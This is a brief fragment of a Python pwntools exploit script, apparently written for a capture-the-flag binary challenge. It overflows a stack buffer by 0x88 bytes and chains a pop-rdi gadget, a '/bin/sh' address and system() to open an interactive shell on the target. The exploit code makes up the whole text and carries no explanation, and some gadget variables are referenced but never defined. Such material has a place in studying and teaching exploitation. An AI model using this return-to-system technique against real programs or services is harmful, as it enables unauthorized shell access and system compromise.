# .plt:00000000004004C0
# .plt:00000000004004C0 _system endp
binsh_addr = 0x600A90
io.recv()
padding = 0x80+0x8
payload = flat([b'a' * padding, pop_rdi_ret,binsh_addr,system_addr])
io.sendline(payload)
io.interactive()